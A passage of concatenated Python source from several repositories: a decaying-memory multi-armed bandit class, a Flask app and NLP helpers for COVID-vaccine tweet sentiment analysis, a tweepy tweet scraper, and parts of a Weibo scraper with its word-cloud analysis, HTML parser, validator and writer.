newarm_idx = [self.arms[i]['mu_hat'] + self.trade_off*(self.arms[i]['ucb']-self.arms[i]['mu_hat']) for i in range(self.no_arms)]
self.next_index = argsort(newarm_idx)[::-1][:self.no_output]
return list(self.next_index)
```
#### File: MABtest/MABtest/uniform_decay.py
```python
from .uniform import *
class uniform_decay(uniform):
def __init__(self, no_arms: int, no_output: int = 1,
conf_level : float =0.05, precision_level: float =0.0,
stop_type: str = 'Best', baseline: Callable[[int],float] = None,
reward_type: str = 'Bernoulli',
time_decay = 0.001) -> None:
# inherent from the uniform class
super(uniform_decay, self).__init__(no_arms, no_output, conf_level, precision_level, stop_type, baseline, reward_type)
# the decay rate
self.time_decay = time_decay
def __str__(self):
""" -> str"""
return self.__class__.__name__
def update(self, arms: list, rewards: list)-> None:
'''
Update the bandit given the observed rewards for arms that are just pulled
Arguments:
arms : contains the index of pulled arms
rewards : the observed reward for each arm in arms
'''
if type(arms) is not list:
arms = [arms]
if type(rewards) is not list:
rewards = [rewards]
if len(arms)!=len(rewards):
raise ValueError("The length of pulled arms and rewards should be equal!")
for i, idx in enumerate(arms):
# get the reward for correspodning arm
reward = rewards[i]
# update the accumulated reward in total for the bandit
self.accreward += reward
# initiate the object for caculating confidence bounds
cb = ConfidenceBound(name = self.bound_type)
# decay the memory for existed samples for all the arms, since in this memory decay senario, our memory decays with 'total time' (i.e. the total number of pulls)
for j in range(self.no_arms):
eacharm = self.arms[j]
self.mu_hat_decreasing.remove(eacharm)
self.ucb_decreasing.remove(eacharm)
self.lcb_decreasing.remove(eacharm)
eacharm['Sum'] *= (1-self.time_decay)
eacharm['t'] *= (1-self.time_decay)
if eacharm['t']>0:
eacharm['mu_hat'] = eacharm['Sum']/eacharm['t']
eacharm['lcb'] = cb.lower_timevar(eacharm['mu_hat'], self.conf_level/float(2.*(self.no_arms-self.no_output)), eacharm['t'], self.time_decay, self.t)
eacharm['ucb'] = cb.upper_timevar(eacharm['mu_hat'], self.conf_level/float(2.*(self.no_output)), eacharm['t'], self.time_decay, self.t)
self.mu_hat_decreasing.add(eacharm)
self.ucb_decreasing.add(eacharm)
self.lcb_decreasing.add(eacharm)
# get the info for correspodning arm
arm = self.arms[idx]
# delete the correspodning arm with old info in the sorted dictionary list
self.mu_hat_decreasing.remove(arm)
self.ucb_decreasing.remove(arm)
self.lcb_decreasing.remove(arm)
# update the corresponding arm with the newly arrived sample
arm['Sum'] += reward
arm['SumSquare'] += reward**2
arm['t'] += 1
arm['mu_hat'] = arm['Sum']/arm['t']
arm['mu_std'] = sqrt(abs(arm['SumSquare']/arm['t'] - arm['mu_hat']**2))
arm['lcb'] = cb.lower_timevar(arm['mu_hat'], self.conf_level/float(2.*(self.no_arms-self.no_output)), arm['t'], self.time_decay, self.t)
arm['ucb'] = cb.upper_timevar(arm['mu_hat'], self.conf_level/float(2.*(self.no_output)), arm['t'], self.time_decay, self.t)
# add back the corresponding arm with updated info to the sorted dicitonary list
self.mu_hat_decreasing.add(arm)
self.ucb_decreasing.add(arm)
self.lcb_decreasing.add(arm)
# update the totoal number of pulls for the bandit
self.t += 1
``` |
{
"source": "jinjin-tonic/COVID-vaccine-sentiment-analysis",
"score": 2
} |
#### File: jinjin-tonic/COVID-vaccine-sentiment-analysis/app.py
```python
from flask import Flask, render_template, url_for, request, redirect
from deployment_model.seq_model import SeqModel
from utils.preprocessing_helper import *
from torchtext.data import Field, Pipeline
from nltk.tokenize import word_tokenize
from wordcloud import STOPWORDS
import torch
import pickle
import os
import nltk
# from flask_bootstrap import Bootstrap
nltk.download("stopwords")
nltk.download("punkt")
# sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
TEMPLATE_DIR = os.path.abspath("./templates")
STATIC_DIR = os.path.abspath("./static")
app = Flask(__name__, template_folder=TEMPLATE_DIR, static_folder=STATIC_DIR)
# original stuff:
# app = Flask(__name__)
# , static_url_path= '', static_folder= './static/vendor'
# app._static_folder = './static/vendor'
# bootstrap = Bootstrap(app)
RESULT = None
pre_pipeline = Pipeline(lemmatize)
pre_pipeline.add_before(preprocessing)
TEXT = Field(
sequential=True,
tokenize=word_tokenize,
lower=True,
stop_words=STOPWORDS,
preprocessing=pre_pipeline,
)
LABELS = ["Neutral", "Negative", "Positive"]
VOCAB = {}
with open("./models/vocab.pkl", "rb") as f:
VOCAB = pickle.load(f)
best_config = {
"hidden_size": 302,
"lr": 0.00010769630091763721,
"l2": 2.5888680371842294e-05,
"nonlin": "tanh",
"dropout": 0.1,
"num_layers": 2,
"mode": 0,
"optimizer": "Adam",
"momentum": 0.1,
}
best_model = SeqModel(
embedding_size=100,
vocab_size=len(VOCAB),
output_size=3,
hidden_size=best_config["hidden_size"],
num_layers=best_config["num_layers"],
nonlin=best_config["nonlin"],
dropout_rate=best_config["dropout"],
mode=best_config["mode"],
unit="gru",
more_features=False,
)
best_model.load_state_dict(torch.load("./models/model_deploy.pt"))
@app.route("/", methods=["POST", "GET"])
def index():
return render_template("index.html")
@app.route("/resultspage", methods=["POST", "GET"])
def resultspage():
tweet = request.form["search"]
RESULT = predict_sentiment(best_model, {"tweet": tweet})[0]
return render_template("resultspage.html", value=RESULT)
def preprocess(tweet):
return [VOCAB.get(token, 0) for token in TEXT.preprocess(tweet)]
def predict_sentiment(model, input_json):
tweet = input_json["tweet"]
num_input = preprocess(tweet)
model_outputs = best_model(torch.LongTensor(num_input).reshape((-1, 1)))
probabilities, predicted = torch.max(model_outputs.cpu().data, 1)
pred_labels = LABELS[predicted]
return pred_labels, probabilities
if __name__ == "__main__":
# Bind to PORT if defined, otherwise default to 5000.
port = int(os.environ.get("PORT", 5000))
app.run(host="0.0.0.0", port=port, debug=True)
```
#### File: COVID-vaccine-sentiment-analysis/scripts/tweet_scraper.py
```python
import tweepy
import webbrowser
import time
import csv
import argparse
import os
def compose_dict_obj(raw_data, keys, search_words):
"""
Return a dictionary of selected keys from raw_data
"""
d = {}
for key in keys:
if key == "keyword":
d[key] = search_words
else:
d[key] = raw_data.get(key)
return d
# the handler is time.sleep(15 * 60) if we reach the rate limit.
def limit_handled(cursor):
while True:
try:
yield cursor.next()
except tweepy.TweepError:
time.sleep(15 * 60)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Process each .")
parser.add_argument("-k", "--keyword", help="The keyword to search", required=True)
parser.add_argument("--num", help="Max number of data to scrape", default=10000)
parser.add_argument(
"-o", "--output", help="The filepath of the output file", default="./raw.csv"
)
args = parser.parse_args()
consumer_key = os.environ["CONSUMER_KEY"]
consumer_secret = os.environ["CONSUMER_SECRET"]
# search_words = "Covid19 vaccine -filter:retweets"
search_words = args.keyword
max_num = int(args.num)
csv_file = args.output
keys = [
"created_at",
"id",
"full_text",
"entities",
"source",
"user",
"coordinates",
"place",
"is_quote_status",
"retweet_count",
"favorite_count",
"possibly_sensitive",
"keyword",
]
callback_uri = "oob" # https://cfe.sh/twitter/callback
auth = tweepy.OAuthHandler(consumer_key, consumer_secret, callback_uri)
redirect_url = auth.get_authorization_url()
print(redirect_url)
webbrowser.open(redirect_url)
user_pint_input = input("What's the pin?")
auth.get_access_token(user_pint_input)
print(auth.access_token, auth.access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
tweetCursor = tweepy.Cursor(
api.search, q=search_words, lang="en", tweet_mode="extended"
).items(max_num)
try:
with open(csv_file, "w") as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=keys)
writer.writeheader()
for i, tweet in enumerate(tweetCursor):
if i % 1000 == 0:
if i == max_num:
break
print(i)
big_json = tweet._json
if "retweeted_status" in big_json:
data = big_json["retweeted_status"]
else:
data = big_json
struct_data = compose_dict_obj(data, keys, search_words)
writer.writerow(struct_data)
except IOError:
print("I/O error")
```
#### File: COVID-vaccine-sentiment-analysis/utils/feature_extractions_helper.py
```python
import nltk
import re
import pandas as pd
from nltk import sent_tokenize, word_tokenize, pos_tag
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from nltk import sent_tokenize, word_tokenize, pos_tag
from emoji.unicode_codes import UNICODE_EMOJI
from nltk.tokenize import RegexpTokenizer
import string
FIRST_PERSON_PRONOUNS = {"i", "me", "my", "mine", "we", "us", "our", "ours"}
SECOND_PERSON_PRONOUNS = {"you", "your", "yours", "u", "ur", "urs"}
THIRD_PERSON_PRONOUNS = {
"he",
"him",
"his",
"she",
"her",
"hers",
"it",
"its",
"they",
"them",
"their",
"theirs",
}
PUNCTUATION_LIST = list(string.punctuation)
###### Attribution for positive words dictionary: https://gist.github.com/mkulakowski2/4289437
positive_words = []
with open("data/helper_dicts/positive-words.txt") as f:
for i in range(35):
f.readline()
for i in range(35, 2042):
positive_words.append(f.readline().strip("\n"))
###### Attribution for negative words dictionary: https://gist.github.com/mkulakowski2/4289441
negative_words = []
with open("data/helper_dicts/negative-words.txt") as f:
for i in range(35):
f.readline()
for i in range(35, 2042):
negative_words.append(f.readline().strip("\n"))
###### This sentiment dictionary for slang words are from SlangSD, made by <NAME> (Student, ASU), <NAME> (Student, ASU), <NAME> (Professor, ASU).
###### Link for SlangSD: http://liangwu.me/slangsd/
slang_df = pd.read_csv(
"data/helper_dicts/SlangSD.txt", delimiter="\t", names=["sentiment"]
)
########################################################
# The verb dictionary used in this code is adapted from https://github.com/monolithpl/verb.forms.dictionary
########################################################
verb_dict = pd.read_csv(
"data/helper_dicts/verbs-dictionaries.csv",
delimiter="\t",
header=None,
names=["present_simple", "past_simple", "past_participle", "present_participle"],
)
past_simples = verb_dict["past_simple"].to_dict().values()
tokenizer = RegexpTokenizer(r"\w+")
def get_avg_pos_words(text):
"""Calculate the positive words ratio per text."""
tokens = word_tokenize(text)
pos_count = 0
for word in tokens:
if word in positive_words:
pos_count += 1
return pos_count / len(tokens)
def get_avg_neg_words(text):
"""Calculate the negative words ratio per text."""
tokens = word_tokenize(text)
neg_count = 0
for word in tokens:
if word in negative_words:
neg_count += 1
return neg_count / len(tokens)
def count_past_tense(text):
"""Count the number of past tense in the text."""
counter = 0
tokens = word_tokenize(text.lower())
tagged_words = pos_tag(tokens)
for word, pos in tagged_words:
if pos[0] == "V":
if word in past_simples:
counter += 1
return counter
def count_future_tense(text):
"""Count the number of future tense in the text."""
future_form = {"'ll", "will", "wo"}
counter = 0
tokens = word_tokenize(text.lower())
tagged_words = pos_tag(tokens)
for word, pos in tagged_words:
if pos == "MD":
if word in future_form:
counter += 1
return counter
def count_first_person_pro(text):
"""Count the number of first-person pronouns in the text."""
return len(
re.findall(r"\b({})\b".format("|".join(FIRST_PERSON_PRONOUNS)), text.lower())
)
def count_second_person_pro(text):
"""Count the number of second-person pronouns in the text."""
return len(
re.findall(r"\b({})\b".format("|".join(SECOND_PERSON_PRONOUNS)), text.lower())
)
def count_third_person_pro(text):
"""Count the number of third-person pronouns in the text."""
return len(
re.findall(r"\b({})\b".format("|".join(THIRD_PERSON_PRONOUNS)), text.lower())
)
def count_coord_conj(text):
"""Count the number of coordinating conjunctions in the text."""
token_tag_pairs = pos_tag(word_tokenize(text.lower()))
return len([p[1] for p in token_tag_pairs if p[1] == "CC"])
def count_commas(text):
"""Count the number of commas in the text."""
counter = 0
tokens = word_tokenize(text.lower())
for word in tokens:
if word == ",":
counter += 1
return counter
def count_multi_punc(text, include_dots=True):
"""Count the number of multi punctuation characters in the text."""
counter = 0
if include_dots:
pattern = r"(\!{2,}|\?{2,}|\.{3,})"
else:
pattern = r"(\!{2,}|\?{2,})"
compiled = re.compile(pattern)
for match in compiled.finditer(text.lower()):
if match:
counter += 1
return counter
def get_avg_slang_sent(text):
"""Calculate the slang ratio per text."""
slang_sent = 0
split = text.split(" ")
tokens = [token.strip("".join(PUNCTUATION_LIST)) for token in split]
for word in tokens:
if word in slang_df.index and word not in stopwords.words("english"):
slang_sent += slang_df.loc[word]["sentiment"]
return slang_sent / len(tokens) ## avg vs just raw sum
def count_tags(text):
"""Count the number of common nouns, proper nouns, adverb, and wh- words"""
words = word_tokenize(text)
tagged_words = nltk.pos_tag(words)
common_noun_count = 0
proper_noun_count = 0
adv_count = 0
wh_count = 0
for word, pos in tagged_words:
if pos == "NN" or pos == "NNS":
common_noun_count += 1
elif pos == "NNPS" or pos == "NNP":
proper_noun_count += 1
elif pos == "RB" or pos == "RBR" or pos == "RBS":
adv_count += 1
elif pos == "WP" or pos == "WDT" or pos == "WRB":
wh_count += 1
return common_noun_count, proper_noun_count, adv_count, wh_count
def count_cap_words(text):
"""Count the amount of capitalized words in a text"""
cap_words = 0
words = word_tokenize(text)
for word in words:
if word.isupper():
cap_words = cap_words + 1
else:
cap_words = cap_words
return cap_words
def avg_len_sent(text):
"""Calculates the average length of sentences, in tokens"""
token_count = len(text.split())
sent_count = text.count(". ") + 1
if sent_count != 0:
return token_count / sent_count
else:
return 0
def avg_len_tokens(text):
"""Calculates the average length of tokens, excluding punctuation, in characters"""
token_with_no_punc = tokenizer.tokenize(text.lower())
if len(token_with_no_punc) != 0:
return len("".join(token_with_no_punc)) / len(token_with_no_punc)
else:
return 0
def num_of_sent(text):
"""Counts the number of sentences"""
return text.count(". ") + 1
def num_slang_acronym(text):
'''Count the amount of slang acronyms in a text'''
return len(re.findall(r"\b({})\b".format("|".join(SLANG)), text.lower()))
```
#### File: COVID-vaccine-sentiment-analysis/utils/preprocessing_helper.py
```python
import string
# import demoji
import nltk
import re
from nltk import sent_tokenize, word_tokenize, pos_tag
from nltk.stem import WordNetLemmatizer
# from emoji.unicode_codes import UNICODE_EMOJI
nltk.download("wordnet")
def preprocessing(text):
"""Exclude punctuations and digits from text."""
text = process_tweets(text)
text = text.lower()
exclude = string.punctuation + string.digits
for i in exclude:
text = text.replace(i, "")
return text
def process_tweets(text):
"""Exclude mentions, urls, and html reference characters in a string using regular expression"""
text = re.sub("(\@|https:\/\/)\S+", "", text) # remove mentions and urls
text = re.sub(r"&[a-z]+;", "", text) # exclude html reference characters
return text
def lemmatize(text):
"""Lemmatize tweets by WordNetLemmatizer"""
lemma_list = []
lemmatizer = WordNetLemmatizer()
text = text.lower()
words = word_tokenize(text)
for word in words:
lemma = lemmatizer.lemmatize(word, "n")
if lemma == word:
lemma = lemmatizer.lemmatize(word, "v")
lemma_list.append(lemma)
return " ".join(lemma_list)
# def convert_emoji_to_text(tweet):
# """Convert emoji into text description in the tweet."""
# tokens = tweet.split()
# for i, token in enumerate(tokens):
# if token in UNICODE_EMOJI:
# emo_desc = demoji.findall(token)[token]
# new_rep = "_".join(emo_desc.split(":")[0].split())
# tokens[i] = new_rep
# return " ".join(tokens)
``` |
{
"source": "jinjun1994/spider",
"score": 2
} |
#### File: weiboSpider/EDA/eda_api.py
```python
import re
import sys
import os
import os.path as osp
import json
import jieba
import jieba.analyse
# from scipy.misc import imread
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from wordcloud import WordCloud,ImageColorGenerator
from PIL import Image
pd.options.mode.chained_assignment = None
abspath = osp.abspath('')
plt.rcParams['font.sans-serif'] = ['Arial Unicode MS']
sns.set(font='Arial Unicode MS') # 解决Seaborn中文显示问题
jieba.analyse.set_stop_words(f'{abspath}/weiboSpider/EDA/stopwords.txt')
# %%
# config配置读取
fp = sys.argv[1]
print(f"{fp}")
bozhu = fp.split('/')[-2]
id = fp.split('/')[-1]
# 存储文件夹
# %%
# 加载数据
weibo = pd.read_csv(fp,error_bad_lines=False)
# https://github.com/pandas-dev/pandas/issues/11493
print("Weibo shape : ", weibo.shape)
weibo.head(1)
# %%
#1-0 画词云
content=' '.join(weibo['微博正文'].tolist())
key_words = jieba.analyse.extract_tags(content, topK=2000, withWeight=True,
allowPOS=('v','vd','n','nr','ns','nt','nz'))
key_words = {p[0]:p[1] for p in key_words}
# %%
# 1-1 画词云
# 画云图
def plot_pic(save_path, key_words):
wc.generate_from_frequencies(key_words)
wc.to_file(save_path)
# plt.figure()
plt.imshow(wc, interpolation='bilinear')
plt.axis("off") # 关掉图像的坐标
# plt.show()
wc = WordCloud(font_path='weiboSpider/EDA/KaiTi.ttf',
max_words=2000,
width=3840,
height=2106,
background_color="white",
margin=5)
plot_pic(f'weiboSpider/weibo/{bozhu}/{id}.png', key_words)
# 1、传入[(key,weighft{bozhu}/),...]列表生成词云
# # %%
# # 2-转评赞曲线图
# publish_data = pd.read_csv(fp, index_col="发布时间", parse_dates=True,error_bad_lines=False)[['点赞数','转发数','评论数']]
# # publish_data = pd.concat([pd.read_csv(fp1, index_col="发布时间", parse_dates=True), pd.read_csv(fp2, index_col="发布时间", parse_dates=True)])[['点赞数','转发数','评论数']]
# print(publish_data)
# avg_M_df = publish_data.resample('M').sum()
# avg_M_df.rename(columns={'点赞数': '月总点赞数', '转发数': '月总转发数', '评论数': '月总评论数'}, inplace=True)
# avg_M_df.index.name = f'{bozhu}老师发博时间'
# plt.figure(figsize=(15, 10))
# plt.title(f"{bozhu}老师 单月转评赞总数")
# sns_plot = sns.lineplot(data=avg_M_df)
# plt.savefig(f"weibo/{bozhu}/pic2.png", bbox_inches='tight', dpi=300)
# plt.show()
# # %%
# # 3-原创转发数
# publish_data = pd.read_csv(fp, index_col="发布时间", parse_dates=True,error_bad_lines=False)[['是否为原创微博']].astype('int')
# yuanchuang = publish_data[publish_data['是否为原创微博'] == 1]
# zhuanfa = publish_data[publish_data['是否为原创微博'] == 0]
# yuanchuang.columns = ['原创']
# zhuanfa.columns = ['转发']
# zhuanfa['转发'] = zhuanfa['转发'].apply(lambda x: 1)
# yuanchuang = yuanchuang.resample('M').sum()
# zhuanfa = zhuanfa.resample('M').sum()
# df = pd.merge(yuanchuang['原创'], zhuanfa['转发'], how='left', on='发布时间').fillna(0).astype('int')
# df.rename(columns={'原创': '当月原创微博数', '转发': '当月转发微博数'}, inplace=True)
# plt.figure(figsize=(15,10))
# plt.title(f"{bozhu} 微博原创与转发量 => 干货满满")
# sns.lineplot(data=df)
# # plt.axhline(y=30, xmin=0.0, xmax=0.99, color='r', linestyle = "--", linewidth=3)
# plt.savefig(f"weibo/{bozhu}/pic3.png", bbox_inches='tight',dpi=300)
# plt.show()
# # %%
# # 4 饼图-发布工具,原创转发比
# publish_tool = pd.read_csv(fp,error_bad_lines=False)[['发布工具']]
# t = sum(publish_tool['发布工具'].value_counts()) * 0.008
# new_dict = {k:v for k,v in dict(publish_tool['发布工具'].value_counts()).items() if k.strip() != '无' and v > t}
# new_dict = {k:v/sum(new_dict.values()) for k,v in new_dict.items()}
# data = pd.Series(new_dict)
# plt.rcParams['figure.figsize'] = (8.0, 6.0) #调整图片大小
# lbs = data.index
# # explodes=[0.1 if i=='iPhone 8' else 0 for i in lbs]
# explodes=[0 for i in lbs]
# plt.pie(data, explode=explodes,labels=lbs, autopct="%1.1f%%",
# colors=sns.color_palette("muted"),startangle = 20,pctdistance = 0.6,
# textprops={'fontsize':10,'color':'black'})
# plt.title(f"{bozhu}老师最喜爱的微博交流工具")
# plt.axis('equal') # 设置x,y轴刻度一致,以使饼图成为圆形。
# plt.savefig(f"weibo/{bozhu}/pic4.png", dpi=300, bbox_inches='tight')
# plt.show()
```
#### File: node-weiboSpider/weiboSpider/html_parser.py
```python
import re
import sys
import traceback
from collections import OrderedDict
from datetime import datetime, timedelta
import requests
from lxml import etree
class Parser:
def __init__(self, config):
self.config = config
def deal_html(self, url, cookie):
"""处理html"""
print("url:", url)
html = requests.get(url, cookies=cookie).content
selector = etree.HTML(html)
return selector
def deal_garbled(self, info):
"""处理乱码"""
info = (info.xpath('string(.)').replace(u'\u200b', '').encode(
sys.stdout.encoding, 'ignore').decode(sys.stdout.encoding))
return info
def extract_picture_urls(self, info, weibo_id):
"""提取微博原始图片url"""
try:
a_list = info.xpath('div/a/@href')
first_pic = 'https://weibo.cn/mblog/pic/' + weibo_id + '?rl=0'
all_pic = 'https://weibo.cn/mblog/picAll/' + weibo_id + '?rl=1'
if first_pic in a_list:
if all_pic in a_list:
selector = self.deal_html(all_pic, self.config['cookie'])
preview_picture_list = selector.xpath('//img/@src')
picture_list = [
p.replace('/thumb180/', '/large/')
for p in preview_picture_list
]
picture_urls = ','.join(picture_list)
else:
if info.xpath('.//img/@src'):
preview_picture = info.xpath('.//img/@src')[-1]
picture_urls = preview_picture.replace(
'/wap180/', '/large/')
else:
sys.exit(
u"爬虫微博可能被设置成了'不显示图片',请前往"
u"'https://weibo.cn/account/customize/pic',修改为'显示'"
)
else:
picture_urls = u'无'
return picture_urls
except Exception:
return u'无'
def get_picture_urls(self, info, is_original):
"""获取微博原始图片url"""
try:
weibo_id = info.xpath('@id')[0][2:]
picture_urls = {}
if is_original:
original_pictures = self.extract_picture_urls(info, weibo_id)
picture_urls['original_pictures'] = original_pictures
if not self.config['filter']:
picture_urls['retweet_pictures'] = u'无'
else:
retweet_url = info.xpath("div/a[@class='cc']/@href")[0]
retweet_id = retweet_url.split('/')[-1].split('?')[0]
retweet_pictures = self.extract_picture_urls(info, retweet_id)
picture_urls['retweet_pictures'] = retweet_pictures
a_list = info.xpath('div[last()]/a/@href')
original_picture = u'无'
for a in a_list:
if a.endswith(('.gif', '.jpeg', '.jpg', '.png')):
original_picture = a
break
picture_urls['original_pictures'] = original_picture
return picture_urls
except Exception as e:
print('Error: ', e)
traceback.print_exc()
def get_video_url(self, info, is_original):
"""获取微博视频url"""
try:
if is_original:
div_first = info.xpath('div')[0]
a_list = div_first.xpath('.//a')
video_link = u'无'
for a in a_list:
if 'm.weibo.cn/s/video/show?object_id=' in a.xpath(
'@href')[0]:
video_link = a.xpath('@href')[0]
break
if video_link != u'无':
video_link = video_link.replace(
'm.weibo.cn/s/video/show', 'm.weibo.cn/s/video/object')
wb_info = requests.get(
video_link, cookies=self.config['cookie']).json()
video_url = wb_info['data']['object']['stream'].get(
'hd_url')
if not video_url:
video_url = wb_info['data']['object']['stream']['url']
if not video_url: # 说明该视频为直播
video_url = u'无'
else:
video_url = u'无'
return video_url
except Exception:
return u'无'
def get_page_num(self, selector):
"""获取微博总页数"""
if selector.xpath("//input[@name='mp']") == []:
page_num = 1
else:
page_num = (int)(
selector.xpath("//input[@name='mp']")[0].attrib['value'])
return page_num
def get_long_weibo(self, weibo_link):
"""获取长原创微博"""
selector = self.deal_html(weibo_link, self.config['cookie'])
info = selector.xpath("//div[@class='c']")[1]
wb_content = self.deal_garbled(info)
wb_time = info.xpath("//span[@class='ct']/text()")[0]
weibo_content = wb_content[wb_content.find(':') +
1:wb_content.rfind(wb_time)]
return weibo_content
def get_original_weibo(self, info, weibo_id):
"""获取原创微博"""
weibo_content = self.deal_garbled(info)
weibo_content = weibo_content[:weibo_content.rfind(u'赞')]
a_text = info.xpath('div//a/text()')
if u'全文' in a_text:
weibo_link = 'https://weibo.cn/comment/' + weibo_id
wb_content = self.get_long_weibo(weibo_link)
if wb_content:
weibo_content = wb_content
return weibo_content
def get_long_retweet(self, weibo_link):
"""获取长转发微博"""
wb_content = self.get_long_weibo(weibo_link)
weibo_content = wb_content[:wb_content.rfind(u'原文转发')]
return weibo_content
def get_retweet(self, info, weibo_id):
"""获取转发微博"""
wb_content = self.deal_garbled(info)
wb_content = wb_content[wb_content.find(':') +
1:wb_content.rfind(u'赞')]
wb_content = wb_content[:wb_content.rfind(u'赞')]
a_text = info.xpath('div//a/text()')
if u'全文' in a_text:
weibo_link = 'https://weibo.cn/comment/' + weibo_id
weibo_content = self.get_long_retweet(weibo_link)
if weibo_content:
wb_content = weibo_content
retweet_reason = self.deal_garbled(info.xpath('div')[-1])
retweet_reason = retweet_reason[:retweet_reason.rindex(u'赞')]
original_user = info.xpath("div/span[@class='cmt']/a/text()")
if original_user:
original_user = original_user[0]
wb_content = (retweet_reason + '\n' + u'原始用户: ' + original_user +
'\n' + u'转发内容: ' + wb_content)
else:
wb_content = retweet_reason + '\n' + u'转发内容: ' + wb_content
return wb_content
def is_original(self, info):
"""判断微博是否为原创微博"""
is_original = info.xpath("div/span[@class='cmt']")
if len(is_original) > 3:
return False
else:
return True
def get_weibo_content(self, info, is_original):
"""获取微博内容"""
weibo_id = info.xpath('@id')[0][2:]
if is_original:
weibo_content = self.get_original_weibo(info, weibo_id)
else:
weibo_content = self.get_retweet(info, weibo_id)
return weibo_content
def get_publish_place(self, info):
"""获取微博发布位置"""
div_first = info.xpath('div')[0]
a_list = div_first.xpath('a')
publish_place = u'无'
for a in a_list:
if ('place.weibo.com' in a.xpath('@href')[0]
and a.xpath('text()')[0] == u'显示地图'):
weibo_a = div_first.xpath("span[@class='ctt']/a")
if len(weibo_a) >= 1:
publish_place = weibo_a[-1]
if (u'视频' == div_first.xpath("span[@class='ctt']/a/text()")
[-1][-2:]):
if len(weibo_a) >= 2:
publish_place = weibo_a[-2]
else:
publish_place = u'无'
publish_place = self.deal_garbled(publish_place)
break
return publish_place
def get_publish_time(self, info):
"""获取微博发布时间"""
try:
str_time = info.xpath("div/span[@class='ct']")
str_time = self.deal_garbled(str_time[0])
publish_time = str_time.split(u'来自')[0]
if u'刚刚' in publish_time:
publish_time = datetime.now().strftime('%Y-%m-%d %H:%M')
elif u'分钟' in publish_time:
minute = publish_time[:publish_time.find(u'分钟')]
minute = timedelta(minutes=int(minute))
publish_time = (datetime.now() -
minute).strftime('%Y-%m-%d %H:%M')
elif u'今天' in publish_time:
today = datetime.now().strftime('%Y-%m-%d')
time = publish_time[3:]
publish_time = today + ' ' + time
if len(publish_time) > 16:
publish_time = publish_time[:16]
elif u'月' in publish_time:
year = datetime.now().strftime('%Y')
month = publish_time[0:2]
day = publish_time[3:5]
time = publish_time[7:12]
publish_time = year + '-' + month + '-' + day + ' ' + time
else:
publish_time = publish_time[:16]
return publish_time
except Exception as e:
print('Error: ', e)
traceback.print_exc()
def get_publish_tool(self, info):
"""获取微博发布工具"""
try:
str_time = info.xpath("div/span[@class='ct']")
str_time = self.deal_garbled(str_time[0])
if len(str_time.split(u'来自')) > 1:
publish_tool = str_time.split(u'来自')[1]
else:
publish_tool = u'无'
return publish_tool
except Exception as e:
print('Error: ', e)
traceback.print_exc()
def get_weibo_footer(self, info):
"""获取微博点赞数、转发数、评论数"""
try:
footer = {}
pattern = r'\d+'
str_footer = info.xpath('div')[-1]
str_footer = self.deal_garbled(str_footer)
str_footer = str_footer[str_footer.rfind(u'赞'):]
weibo_footer = re.findall(pattern, str_footer, re.M)
up_num = int(weibo_footer[0])
footer['up_num'] = up_num
retweet_num = int(weibo_footer[1])
footer['retweet_num'] = retweet_num
comment_num = int(weibo_footer[2])
footer['comment_num'] = comment_num
return footer
except Exception as e:
print('Error: ', e)
traceback.print_exc()
def get_one_weibo(self, info):
"""获取一条微博的全部信息"""
try:
weibo = OrderedDict()
is_original = self.is_original(info)
if (not self.config['filter']) or is_original:
weibo['id'] = info.xpath('@id')[0][2:]
weibo['content'] = self.get_weibo_content(info,
is_original) # 微博内容
weibo['publish_place'] = self.get_publish_place(info) # 微博发布位置
weibo['publish_time'] = self.get_publish_time(info) # 微博发布时间
weibo['publish_tool'] = self.get_publish_tool(info) # 微博发布工具
footer = self.get_weibo_footer(info)
weibo['up_num'] = footer['up_num'] # 微博点赞数
weibo['retweet_num'] = footer['retweet_num'] # 转发数
weibo['comment_num'] = footer['comment_num'] # 评论数
picture_urls = self.get_picture_urls(info, is_original)
weibo['original_pictures'] = picture_urls[
'original_pictures'] # 原创图片url
if not self.config['filter']:
weibo['retweet_pictures'] = picture_urls[
'retweet_pictures'] # 转发图片url
weibo['original'] = is_original # 是否原创微博
weibo['video_url'] = self.get_video_url(info,
is_original) # 微博视频url
else:
weibo = None
return weibo
except Exception as e:
print('Error: ', e)
traceback.print_exc()
def is_pinned_weibo(self, info):
"""判断微博是否为置顶微博"""
kt = info.xpath(".//span[@class='kt']/text()")
if kt and kt[0] == u'置顶':
return True
else:
return False
```
#### File: node-weiboSpider/weiboSpider/validator.py
```python
from datetime import datetime
import sys
def is_date(since_date):
"""判断日期格式是否正确"""
try:
datetime.strptime(since_date, "%Y-%m-%d")
return True
except:
return False
class Validator:
def __init__(self, config):
"""
self.user_id_list = '' # 1. 用户id list,如昵称为"Dear-迪丽热巴"的id为'1669879400';2. 存储用户id list 的文件名
self.since_date = since_date # 1. 起始时间,即爬取发布日期从该值到现在的微博,形式为yyyy-mm-dd 2. 起始时间距离今天的天数,形式为一个整数
self.filter = filter # 取值范围为0、1,程序默认值为0,代表要爬取用户的全部微博,1代表只爬取用户的原创微博
self.mongodb_write = mongodb_write # 值为0代表不将结果写入MongoDB数据库,1代表写入
self.mysql_write = mysql_write # 值为0代表不将结果写入MySQL数据库,1代表写入
self.pic_download = pic_download # 取值范围为0、1,程序默认值为0,代表不下载微博原始图片,1代表下载
self.video_download = video_download # 取值范围为0、1,程序默认为0,代表不下载微博视频,1代表下载
self.mysql_config = {
} # MySQL数据库连接配置,可以不填,当使用者的mysql用户名、密码等与本程序默认值不同时,需要通过mysql_config来自定义
"""
self.config = config
def validate(self):
bool_config = ["filter", "pic_download", "video_download"]
date_config = ["since_date"]
for key in bool_config:
if self.config[key] not in [0, 1]:
sys.exit("%s值应为0或1,请重新输入" % key)
for key in date_config:
if not (type(self.config[key]) == type(0)
or is_date(self.config[key])):
sys.exit("%s值应为yyyy-mm-dd形式或整数,请重新输入" % key)
for mode in self.config['write_mode']:
if mode not in ['txt', 'csv', 'mysql', 'mongo']:
sys.exit("write_mode值应为txt,csv,mysql,mongo,请重新输入")
```
#### File: node-weiboSpider/weiboSpider/writer.py
```python
import copy
import csv
import os
import sys
import traceback
def get_filepath(type, nickname):
"""获取结果文件路径"""
file_dir = os.path.split(
os.path.realpath(__file__))[0] + os.sep + 'weibo' + os.sep + nickname
if type == 'img' or type == 'video':
file_dir = file_dir + os.sep + type
if not os.path.isdir(file_dir):
os.makedirs(file_dir)
